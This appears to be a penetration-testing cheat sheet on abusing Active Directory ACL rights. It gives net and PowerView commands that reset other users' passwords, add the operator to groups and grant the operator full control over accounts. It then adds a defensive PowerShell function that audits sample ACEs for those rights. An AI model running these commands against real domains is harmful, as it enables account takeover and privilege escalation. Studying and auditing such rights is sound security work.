ACLs/ACEs

- GenericAll and AllExtendedRights

Once we have used PowerView to locate a user over which we hold GenericAll or AllExtendedRights access rights, we can change its password:

net user vulnuser Password123! /domain

Once we have used PowerView to locate a group over which we hold GenericAll access rights, we can add ourselves to it:

net group testgroup user /add /domain

- WriteDACL

Once we have used PowerView to locate a user over which we hold WriteDACL access rights, we can grant ourselves the GenericAll access right over it:

Add-DomainObjectAcl -TargetIdentity vulnuser -PrincipalIdentity {our user} -Rights All

- User-Force-Change-Password

Once we have used PowerView to locate a user or group that holds User-Force-Change-Password rights over another user, we must load PowerView within a session of the user who holds those rights, or who is part of the group that holds them, and execute the following command:

Set-DomainUserPassword -Identity Vulnuser -AccountPassword (ConvertTo-SecureString 'Password123!' -AsPlainText -Force) -Verbose
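
Each right above is an ACE on the target object's DACL, so the same conditions can be audited from the defender's side. The following is an added example, not part of the original page: the function name `Find-RiskyAce`, the trusted-principal list, the `CORP` domain and the sample ACEs are assumptions constructed for illustration.

```powershell
# Added example: flag non-trusted Allow ACEs that grant the rights listed on this page.
$ForceChangePassword = [guid]'00299570-246d-11d0-a768-00aa006e0529'  # User-Force-Change-Password
$AllObjects          = [guid]::Empty  # ExtendedRight + empty ObjectType = all extended rights

function Find-RiskyAce {  # hypothetical helper name
    param(
        [Parameter(Mandatory)] [object[]] $Ace,
        # Principals expected to hold these rights (assumed list; adjust per domain)
        [string[]] $TrustedPrincipal = @('CORP\Domain Admins', 'NT AUTHORITY\SYSTEM')
    )
    foreach ($a in $Ace) {
        $who = "$($a.IdentityReference)"
        if ("$($a.AccessControlType)" -ne 'Allow' -or $TrustedPrincipal -contains $who) { continue }
        # ActiveDirectoryRights is a flags enum rendered as "ReadProperty, WriteDacl"
        $rights  = "$($a.ActiveDirectoryRights)" -split ',\s*'
        $isExt   = $rights -contains 'ExtendedRight'
        $finding = $null
        if     ($rights -contains 'GenericAll') { $finding = 'GenericAll' }
        elseif ($rights -contains 'WriteDacl')  { $finding = 'WriteDACL' }
        elseif ($isExt -and [guid]$a.ObjectType -eq $AllObjects)          { $finding = 'AllExtendedRights' }
        elseif ($isExt -and [guid]$a.ObjectType -eq $ForceChangePassword) { $finding = 'User-Force-Change-Password' }
        if ($finding) {
            [pscustomobject]@{ Target = $a.Target; Principal = $who; Finding = $finding }
        }
    }
}

# Constructed ACEs shaped like the entries of (Get-Acl "AD:\<distinguishedName>").Access
# from the ActiveDirectory module; Target is added here so each finding names its object.
$fcp  = '00299570-246d-11d0-a768-00aa006e0529'
$none = '00000000-0000-0000-0000-000000000000'
$sample = @(
    [pscustomobject]@{ Target='vulnuser';  IdentityReference='CORP\helpdesk1';     ActiveDirectoryRights='GenericAll';              ObjectType=$none; AccessControlType='Allow' }
    [pscustomobject]@{ Target='testgroup'; IdentityReference='CORP\Domain Admins'; ActiveDirectoryRights='GenericAll';              ObjectType=$none; AccessControlType='Allow' }
    [pscustomobject]@{ Target='vulnuser';  IdentityReference='CORP\svc-backup';    ActiveDirectoryRights='ReadProperty, WriteDacl'; ObjectType=$none; AccessControlType='Allow' }
    [pscustomobject]@{ Target='vulnuser';  IdentityReference='CORP\tier1-support'; ActiveDirectoryRights='ExtendedRight';           ObjectType=$fcp;  AccessControlType='Allow' }
    [pscustomobject]@{ Target='vulnuser';  IdentityReference='CORP\contractor';    ActiveDirectoryRights='GenericAll';              ObjectType=$none; AccessControlType='Deny' }
)

# Trusted principals and Deny ACEs are skipped; the rest are reported for review.
Find-RiskyAce -Ace $sample | Format-Table -AutoSize
```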
